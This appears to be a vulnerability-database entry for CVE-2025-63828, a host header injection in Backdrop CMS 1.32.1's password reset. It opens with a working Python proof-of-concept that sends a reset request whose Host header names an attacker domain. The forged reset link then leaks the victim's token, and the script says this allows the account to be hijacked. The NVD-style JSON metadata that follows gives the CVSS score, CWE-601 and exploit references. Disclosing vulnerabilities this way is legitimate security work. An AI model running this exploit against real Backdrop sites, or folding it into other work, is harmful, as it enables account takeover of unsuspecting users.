CVE-2025-63828

import requests # CVE-2025-63828 PoC - Host Header Injection in Backdrop CMS 1.32.1 # Target: Backdrop CMS password reset functionality # Attack: Manipulate Host header to redirect password reset to malicious domain TARGET_URL = "http://target-backdrop-cms.com" MALICIOUS_DOMAIN = "attacker-controlled-domain.com" def exploit_host_header_injection(): """ Exploit Host Header Injection in password reset functionality This causes the password reset email to contain a link to the attacker's domain """ # Step 1: Request password reset with manipulated Host header reset_endpoint = f"{TARGET_URL}/user/password" headers = { "Host": MALICIOUS_DOMAIN, "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } data = { "name": "[email protected]" # Target victim email } response = requests.post(reset_endpoint, headers=headers, data=data) print(f"[*] Sent password reset request with malicious Host header: {MALICIOUS_DOMAIN}") print(f"[*] Response Status: {response.status_code}") # Step 2: If successful, victim's email will contain a reset link pointing to attacker domain # The link format will be: http://attacker-controlled-domain.com/user/password/reset/TOKEN print("[*] If successful, victim will receive email with malicious password reset link") print("[*] Attacker can then capture the reset token and hijack the account") if __name__ == "__main__": exploit_host_header_injection()

{"cve": {"id": "CVE-2025-63828", "sourceIdentifier": "[email protected]", "published": "2025-11-18T18:16:13.753", "lastModified": "2025-11-24T14:02:35.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Host Header Injection vulnerability in Backdrop CMS 1.32.1 allows attackers to manipulate the Host header in password reset requests, leading to redirects to malicious domains and potential session hijacking via cookie injection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:backdropcms:backdrop_cms:1.32.1:*:*:*:*:*:*:*", "matchCriteriaId": "8209232D-0189-4B0B-A2DD-AC09C6BA7B6B"}]}]}], "references": [{"url": "https://github.com/mertdurum06/BackdropCms-1.32.1/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/mertdurum06/BackdropCms-1.32.1/blob/main/backdropcms_exploit.txt", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/mertdurum06/BackdropCms-1.32.1/blob/main/backdropcms_exploit.txt", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}